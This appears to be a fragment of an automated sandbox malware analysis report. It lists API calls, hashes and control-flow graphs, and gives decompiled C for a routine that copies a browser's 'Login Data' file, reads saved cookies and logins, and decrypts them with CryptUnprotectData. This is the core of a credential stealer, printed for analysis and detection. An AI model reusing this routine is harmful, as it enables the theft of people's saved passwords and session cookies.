                                                                                                                                                                        • wsprintfW.USER32 ref: 00403102
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040310C
                                                                                                                                                                        • wsprintfW.USER32 ref: 004031A6
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004031B0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031CB
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004031D4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031E2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004031EC
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00403223
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$File$Deletelstrlenwsprintf$AllocCopyCryptDataUnprotect
                                                                                                                                                                        • String ID: 8Ym$Cookies$FALSE$Network\Cookies$TRUE$XYm$v10$xYm
                                                                                                                                                                        • API String ID: 3838148118-1547452649
                                                                                                                                                                        • Opcode ID: cb4b49c8d858d8dc12969dc26ee80fe5395de1f12ccb40e4059484e4599b5c3f
                                                                                                                                                                        • Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
                                                                                                                                                                        • Opcode Fuzzy Hash: cb4b49c8d858d8dc12969dc26ee80fe5395de1f12ccb40e4059484e4599b5c3f
                                                                                                                                                                        • Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 830 4027b8-402840 call 4017fa call 401934 839 402842-402845 LocalFree 830->839 840 40284b-402867 CryptUnprotectData 830->840 839->840 841 402869-40287d call 40177f 840->841 842 40288b-40288f 840->842 841->842 851 40287f-402889 841->851 844 402891-402894 LocalFree 842->844 845 40289a-40289e 842->845 844->845 847 4028a0-4028a3 LocalFree 845->847 848 4028a9-4028ad 845->848 847->848 849 4028b8-4028ba 848->849 850 4028af-4028b2 LocalFree 848->850 852 4028c3-4028c5 849->852 853 4028bc-4028bd LocalFree 849->853 850->849 851->842 854 4028c7-4028c8 LocalFree 852->854 855 4028ce-4028d3 852->855 853->852 854->855 857 402c97 855->857 858 4028d9-4029b3 call 40a69e 855->858 859 402c99-402c9d 857->859 873 4029b9-4029c7 CopyFileW 858->873 874 402c9e-402cb6 LocalFree DeleteFileW LocalFree 858->874 873->874 875 4029cd-4029dc 873->875 874->859 877 4029e3-4029e7 875->877 878 4029de-4029e1 875->878 880 402a01-402a1d 877->880 881 4029e9-4029eb 877->881 879 4029ec-4029fc LocalFree * 2 878->879 879->859 883 402a3f-402a4c 880->883 884 402a1f-402a3a LocalFree * 2 880->884 881->879 887 402a52 883->887 888 402c66-402c68 883->888 884->859 889 402a55-402a83 887->889 890 402c71-402c8e DeleteFileW 888->890 891 402c6a-402c6b LocalFree 888->891 898 402a89-402a8d 889->898 899 402c4d-402c5a 889->899 890->857 896 402c90-402c91 LocalFree 890->896 891->890 896->857 900 402a98-402ab9 898->900 901 402a8f-402a92 898->901 899->889 903 402c60-402c63 899->903 900->899 906 402abf-402b03 900->906 901->899 901->900 903->888 910 402c46-402c47 LocalFree 906->910 911 402b09-402b37 906->911 910->899 914 402bb0-402bd5 911->914 915 402b39-402b5b call 40177f 911->915 918 402c35 914->918 919 402bd7-402c11 call 40a4c2 lstrlenW 914->919 925 402b95 915->925 926 402b5d-402b86 lstrlenW 915->926 922 402c38-402c3a 918->922 933 402c13-402c1c call 40a503 919->933 934 402c1e-402c22 919->934 927 402c43 922->927 928 402c3c-402c3d LocalFree 922->928 929 402b98-402b9c 925->929 926->929 935 402b88-402b93 call 40a503 926->935 927->910 928->927 929->922 932 402ba2 929->932 936 402ba5-402bab LocalFree 932->936 933->934 939 402c24-402c27 LocalFree 934->939 940 402c2d-402c30 934->940 935->929 936->922 939->940 940->936
                                                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                                                        			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v9;
                                                                                                                                                                        				char _v10;
                                                                                                                                                                        				char _v11;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				void* _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				char _v72;
                                                                                                                                                                        				void* _v76;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				void* _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                        				intOrPtr _t130;
                                                                                                                                                                        				void* _t134;
                                                                                                                                                                        				void* _t135;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				int _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				void* _t146;
                                                                                                                                                                        				void* _t153;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				intOrPtr _t158;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				WCHAR* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				void* _t174;
                                                                                                                                                                        				int _t175;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				int _t185;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				intOrPtr* _t203;
                                                                                                                                                                        				void* _t204;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				void* _t253;
                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				void* _t260;
                                                                                                                                                                        				char _t261;
                                                                                                                                                                        				void* _t263;
                                                                                                                                                                        				void* _t265;
                                                                                                                                                                        				signed int _t266;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        				intOrPtr* _t270;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        
                                                                                                                                                                        				_t203 = __edx;
                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                        				_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t253 = _t104;
                                                                                                                                                                        				E004017FA(_t253,  &_v8,  &_v52);
                                                                                                                                                                        				 *_t270 = 0x200;
                                                                                                                                                                        				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
                                                                                                                                                                        				_v48 = _t259;
                                                                                                                                                                        				E00401934(_v8,  &_v48,  *0x40e044, _v52);
                                                                                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                                                                                        				_v60 = _t259;
                                                                                                                                                                        				_v64 = 0x200;
                                                                                                                                                                        				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_v24 = _t260;
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t115 =  *((intOrPtr*)( *0x40e0b0))( &_v64,  &_v28, 0, 0, 0, 0,  &_v72); // executed
                                                                                                                                                                        				if(_t115 != 0) {
                                                                                                                                                                        					_t199 = E0040177F(_v68,  &_v24, _v72);
                                                                                                                                                                        					_t260 = _v24;
                                                                                                                                                                        					if(_t199 != 0) {
                                                                                                                                                                        						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v28 != 0) {
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v60 != 0) {
                                                                                                                                                                        					LocalFree(_v60);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v68 != 0) {
                                                                                                                                                                        					LocalFree(_v68);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t260 != 0) {
                                                                                                                                                                        					LocalFree(_t260);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t253 != 0) {
                                                                                                                                                                        					LocalFree(_t253);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t261 = _a16;
                                                                                                                                                                        				if(_t261 == 0) {
                                                                                                                                                                        					L57:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
                                                                                                                                                                        					 *0x40e4d4 = _t118;
                                                                                                                                                                        					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
                                                                                                                                                                        					 *0x40e4c8 = _t120;
                                                                                                                                                                        					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
                                                                                                                                                                        					 *0x40e4bc = _t122;
                                                                                                                                                                        					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
                                                                                                                                                                        					 *0x40e4c4 = _t124;
                                                                                                                                                                        					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
                                                                                                                                                                        					 *0x40e4cc = _t126;
                                                                                                                                                                        					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
                                                                                                                                                                        					 *0x40e4b8 = _t128;
                                                                                                                                                                        					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
                                                                                                                                                                        					 *0x40e4c0 = _t130;
                                                                                                                                                                        					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
                                                                                                                                                                        					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_v32 = _t135;
                                                                                                                                                                        					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
                                                                                                                                                                        					_v56 = _t263;
                                                                                                                                                                        					_t137 = E0040A69E( *0x40e000,  &_v32);
                                                                                                                                                                        					_t204 = _v32;
                                                                                                                                                                        					if(_t137 == 0) {
                                                                                                                                                                        						L59:
                                                                                                                                                                        						LocalFree(_t263);
                                                                                                                                                                        						DeleteFileW(_t204);
                                                                                                                                                                        						return LocalFree(_t204) | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t142 = CopyFileW(_t263, _t204, 0); // executed
                                                                                                                                                                        					if(_t142 == 0) {
                                                                                                                                                                        						goto L59;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t144 =  *0x40e4c8(_t204,  &_v24); // executed
                                                                                                                                                                        					if(_t144 == 0) {
                                                                                                                                                                        						if(_v24 != 0) {
                                                                                                                                                                        							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0); // executed
                                                                                                                                                                        							_t271 = _t270 + 0x14;
                                                                                                                                                                        							if(_t146 == 0) {
                                                                                                                                                                        								_push(_a16);
                                                                                                                                                                        								if( *0x40e4cc() != 0x64) {
                                                                                                                                                                        									L53:
                                                                                                                                                                        									if(_t263 != 0) {
                                                                                                                                                                        										LocalFree(_t263);
                                                                                                                                                                        									}
                                                                                                                                                                        									 *0x40e4bc(_a16);
                                                                                                                                                                        									 *0x40e4c4(_v24); // executed
                                                                                                                                                                        									DeleteFileW(_t204); // executed
                                                                                                                                                                        									if(_t204 != 0) {
                                                                                                                                                                        										LocalFree(_t204);
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L57;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t205 = _v44;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t153 =  *0x40e4c0(_a16, 0);
                                                                                                                                                                        									_t154 =  *0x40e4c0(_a16, 1);
                                                                                                                                                                        									_v48 = _t154;
                                                                                                                                                                        									_t155 =  *0x40e4c0(_a16, 2);
                                                                                                                                                                        									_t271 = _t271 + 0x18;
                                                                                                                                                                        									_t255 = _t155;
                                                                                                                                                                        									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
                                                                                                                                                                        										_t157 =  *0x40e4b8(_a16, 0);
                                                                                                                                                                        										_v44 = _t157;
                                                                                                                                                                        										_t158 =  *0x40e4b8(_a16, 1);
                                                                                                                                                                        										_t271 = _t271 + 0x10;
                                                                                                                                                                        										_v40 = _t158;
                                                                                                                                                                        										if(_t255 <= 0) {
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t265 =  *0x40e4d0(_a16, 2);
                                                                                                                                                                        										_t54 = _t255 + 0x40; // 0x40
                                                                                                                                                                        										_v36 = _t265;
                                                                                                                                                                        										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
                                                                                                                                                                        										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
                                                                                                                                                                        										_v48 = _t161;
                                                                                                                                                                        										_v12 =  *_t161;
                                                                                                                                                                        										_v11 =  *((intOrPtr*)(_t161 + 1));
                                                                                                                                                                        										_v10 =  *((intOrPtr*)(_t161 + 2));
                                                                                                                                                                        										_v9 = 0;
                                                                                                                                                                        										if(_t265 == 0) {
                                                                                                                                                                        											L50:
                                                                                                                                                                        											LocalFree(_t161);
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        										_t165 =  *0x40e1a4; // 0x6ee280
                                                                                                                                                                        										_v20 = _t165;
                                                                                                                                                                        										_push("v10");
                                                                                                                                                                        										_push( &_v12);
                                                                                                                                                                        										_v8 = _t266;
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e084))() != 0) {
                                                                                                                                                                        											_push( &_v80);
                                                                                                                                                                        											_v84 = _v36;
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_push(0);
                                                                                                                                                                        											_v88 = 0x200;
                                                                                                                                                                        											_push( &_v88);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
                                                                                                                                                                        												_t267 = _v8;
                                                                                                                                                                        												L47:
                                                                                                                                                                        												if(_t267 != 0) {
                                                                                                                                                                        													LocalFree(_t267);
                                                                                                                                                                        												}
                                                                                                                                                                        												_t161 = _v48;
                                                                                                                                                                        												goto L50;
                                                                                                                                                                        											}
                                                                                                                                                                        											 *((char*)(_v80 + _v76)) = 0;
                                                                                                                                                                        											_t173 = E0040A4C2(_v76);
                                                                                                                                                                        											_v36 = _t173;
                                                                                                                                                                        											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
                                                                                                                                                                        											_t271 = _t271 + 0x14;
                                                                                                                                                                        											_t175 = lstrlenW(_v20);
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        											if(_t174 >= _t175) {
                                                                                                                                                                        												 *_t205 = E0040A503( *_t205, _t267);
                                                                                                                                                                        											}
                                                                                                                                                                        											if(_v76 != 0) {
                                                                                                                                                                        												LocalFree(_v76);
                                                                                                                                                                        											}
                                                                                                                                                                        											LocalFree(_v36);
                                                                                                                                                                        											L39:
                                                                                                                                                                        											goto L47;
                                                                                                                                                                        										}
                                                                                                                                                                        										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
                                                                                                                                                                        										if(E0040177F(_v36,  &_v16, _t255) == 0) {
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
                                                                                                                                                                        											_t271 = _t271 + 0x14;
                                                                                                                                                                        											_t185 = lstrlenW(_v20);
                                                                                                                                                                        											_t267 = _v8;
                                                                                                                                                                        											if(_t184 >= _t185) {
                                                                                                                                                                        												 *_t205 = E0040A503( *_t205, _t267);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_v16 == 0) {
                                                                                                                                                                        											goto L47;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											LocalFree(_v16);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									L51:
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        								} while ( *0x40e4cc() == 0x64);
                                                                                                                                                                        								_t204 = _v32;
                                                                                                                                                                        								_t263 = _v56;
                                                                                                                                                                        								goto L53;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t263);
                                                                                                                                                                        							LocalFree(_t204);
                                                                                                                                                                        							 *0x40e4c4(_v24);
                                                                                                                                                                        							_t190 = 0xfffffffd;
                                                                                                                                                                        							return _t190;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t258 = 0xfffffffe;
                                                                                                                                                                        						L22:
                                                                                                                                                                        						LocalFree(_t263);
                                                                                                                                                                        						LocalFree(_t204);
                                                                                                                                                                        						return _t258;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t258 = 0xffffffffffffffff;
                                                                                                                                                                        					goto L22;
                                                                                                                                                                        				}
                                                                                                                                                                        			}









































































                                                                                                                                                                        0x004027cd
                                                                                                                                                                        0x004027cf
                                                                                                                                                                        0x004027d2
                                                                                                                                                                        0x004027de
                                                                                                                                                                        0x004027e0
                                                                                                                                                                        0x004027e7
                                                                                                                                                                        0x004027ef
                                                                                                                                                                        0x004027fa
                                                                                                                                                                        0x00402808
                                                                                                                                                                        0x00402811
                                                                                                                                                                        0x00402814
                                                                                                                                                                        0x0040281e
                                                                                                                                                                        0x0040282b
                                                                                                                                                                        0x0040282e
                                                                                                                                                                        0x0040283b
                                                                                                                                                                        0x0040283d
                                                                                                                                                                        0x00402840
                                                                                                                                                                        0x00402845
                                                                                                                                                                        0x00402845
                                                                                                                                                                        0x00402863
                                                                                                                                                                        0x00402867
                                                                                                                                                                        0x00402872
                                                                                                                                                                        0x00402877
                                                                                                                                                                        0x0040287d
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x00402889
                                                                                                                                                                        0x0040287d
                                                                                                                                                                        0x0040288f
                                                                                                                                                                        0x00402894
                                                                                                                                                                        0x00402894
                                                                                                                                                                        0x0040289e
                                                                                                                                                                        0x004028a3
                                                                                                                                                                        0x004028a3
                                                                                                                                                                        0x004028ad
                                                                                                                                                                        0x004028b2
                                                                                                                                                                        0x004028b2
                                                                                                                                                                        0x004028ba
                                                                                                                                                                        0x004028bd
                                                                                                                                                                        0x004028bd
                                                                                                                                                                        0x004028c5
                                                                                                                                                                        0x004028c8
                                                                                                                                                                        0x004028c8
                                                                                                                                                                        0x004028ce
                                                                                                                                                                        0x004028d3
                                                                                                                                                                        0x00402c97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004028d9
                                                                                                                                                                        0x004028e5
                                                                                                                                                                        0x004028ed
                                                                                                                                                                        0x004028f8
                                                                                                                                                                        0x00402900
                                                                                                                                                                        0x0040290b
                                                                                                                                                                        0x00402913
                                                                                                                                                                        0x0040291e
                                                                                                                                                                        0x00402926
                                                                                                                                                                        0x00402931
                                                                                                                                                                        0x00402939
                                                                                                                                                                        0x00402944
                                                                                                                                                                        0x0040294c
                                                                                                                                                                        0x00402957
                                                                                                                                                                        0x0040295f
                                                                                                                                                                        0x00402971
                                                                                                                                                                        0x0040297e
                                                                                                                                                                        0x0040298b
                                                                                                                                                                        0x0040299b
                                                                                                                                                                        0x004029a1
                                                                                                                                                                        0x004029a6
                                                                                                                                                                        0x004029a9
                                                                                                                                                                        0x004029ae
                                                                                                                                                                        0x004029b3
                                                                                                                                                                        0x00402c9e
                                                                                                                                                                        0x00402c9f
                                                                                                                                                                        0x00402ca6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402cb3
                                                                                                                                                                        0x004029c3
                                                                                                                                                                        0x004029c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029d2
                                                                                                                                                                        0x004029dc
                                                                                                                                                                        0x004029e7
                                                                                                                                                                        0x00402a12
                                                                                                                                                                        0x00402a18
                                                                                                                                                                        0x00402a1d
                                                                                                                                                                        0x00402a3f
                                                                                                                                                                        0x00402a4c
                                                                                                                                                                        0x00402c66
                                                                                                                                                                        0x00402c68
                                                                                                                                                                        0x00402c6b
                                                                                                                                                                        0x00402c6b
                                                                                                                                                                        0x00402c74
                                                                                                                                                                        0x00402c7d
                                                                                                                                                                        0x00402c86
                                                                                                                                                                        0x00402c8e
                                                                                                                                                                        0x00402c91
                                                                                                                                                                        0x00402c91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c8e
                                                                                                                                                                        0x00402a52
                                                                                                                                                                        0x00402a55
                                                                                                                                                                        0x00402a5a
                                                                                                                                                                        0x00402a67
                                                                                                                                                                        0x00402a72
                                                                                                                                                                        0x00402a75
                                                                                                                                                                        0x00402a7b
                                                                                                                                                                        0x00402a7e
                                                                                                                                                                        0x00402a83
                                                                                                                                                                        0x00402a9d
                                                                                                                                                                        0x00402aa8
                                                                                                                                                                        0x00402aab
                                                                                                                                                                        0x00402ab1
                                                                                                                                                                        0x00402ab4
                                                                                                                                                                        0x00402ab9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ad0
                                                                                                                                                                        0x00402ad4
                                                                                                                                                                        0x00402ad7
                                                                                                                                                                        0x00402add
                                                                                                                                                                        0x00402ae7
                                                                                                                                                                        0x00402ae9
                                                                                                                                                                        0x00402aee
                                                                                                                                                                        0x00402af4
                                                                                                                                                                        0x00402afa
                                                                                                                                                                        0x00402afd
                                                                                                                                                                        0x00402b03
                                                                                                                                                                        0x00402c46
                                                                                                                                                                        0x00402c47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c47
                                                                                                                                                                        0x00402b1d
                                                                                                                                                                        0x00402b1f
                                                                                                                                                                        0x00402b24
                                                                                                                                                                        0x00402b2a
                                                                                                                                                                        0x00402b2f
                                                                                                                                                                        0x00402b30
                                                                                                                                                                        0x00402b37
                                                                                                                                                                        0x00402bb6
                                                                                                                                                                        0x00402bb9
                                                                                                                                                                        0x00402bc1
                                                                                                                                                                        0x00402bc2
                                                                                                                                                                        0x00402bc3
                                                                                                                                                                        0x00402bc4
                                                                                                                                                                        0x00402bc5
                                                                                                                                                                        0x00402bc9
                                                                                                                                                                        0x00402bd0
                                                                                                                                                                        0x00402bd5
                                                                                                                                                                        0x00402c35
                                                                                                                                                                        0x00402c38
                                                                                                                                                                        0x00402c3a
                                                                                                                                                                        0x00402c3d
                                                                                                                                                                        0x00402c3d
                                                                                                                                                                        0x00402c43
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c43
                                                                                                                                                                        0x00402bdd
                                                                                                                                                                        0x00402be1
                                                                                                                                                                        0x00402bf6
                                                                                                                                                                        0x00402c00
                                                                                                                                                                        0x00402c02
                                                                                                                                                                        0x00402c0a
                                                                                                                                                                        0x00402c0e
                                                                                                                                                                        0x00402c11
                                                                                                                                                                        0x00402c1c
                                                                                                                                                                        0x00402c1c
                                                                                                                                                                        0x00402c22
                                                                                                                                                                        0x00402c27
                                                                                                                                                                        0x00402c27
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402b50
                                                                                                                                                                        0x00402b5b
                                                                                                                                                                        0x00402b95
                                                                                                                                                                        0x00402b5d
                                                                                                                                                                        0x00402b75
                                                                                                                                                                        0x00402b77
                                                                                                                                                                        0x00402b7f
                                                                                                                                                                        0x00402b83
                                                                                                                                                                        0x00402b86
                                                                                                                                                                        0x00402b91
                                                                                                                                                                        0x00402b91
                                                                                                                                                                        0x00402b86
                                                                                                                                                                        0x00402b9c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba2
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402ba5
                                                                                                                                                                        0x00402b9c
                                                                                                                                                                        0x00402c4d
                                                                                                                                                                        0x00402c4d
                                                                                                                                                                        0x00402c57
                                                                                                                                                                        0x00402c60
                                                                                                                                                                        0x00402c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402c63
                                                                                                                                                                        0x00402a20
                                                                                                                                                                        0x00402a27
                                                                                                                                                                        0x00402a30
                                                                                                                                                                        0x00402a39
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402a39
                                                                                                                                                                        0x004029eb
                                                                                                                                                                        0x004029ec
                                                                                                                                                                        0x004029ed
                                                                                                                                                                        0x004029f4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029fa
                                                                                                                                                                        0x004029de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004029de

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402845
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402863
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402894
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028A3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028B2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028BD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004028C8
                                                                                                                                                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 004029C3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004029ED
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004029F4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402A20
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402A27
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402C9F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402CA6
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402CAD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$File$CopyCryptDataDeleteUnprotect
                                                                                                                                                                        • String ID: 8Ym$Login Data$XYm$v10$xYm
                                                                                                                                                                        • API String ID: 1742448742-1597993673
                                                                                                                                                                        • Opcode ID: e331a75e1731fd4ecb6253aaf8f91baeb70ae3a90a543f5c9c81847e5ae278c2
                                                                                                                                                                        • Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
                                                                                                                                                                        • Opcode Fuzzy Hash: e331a75e1731fd4ecb6253aaf8f91baeb70ae3a90a543f5c9c81847e5ae278c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
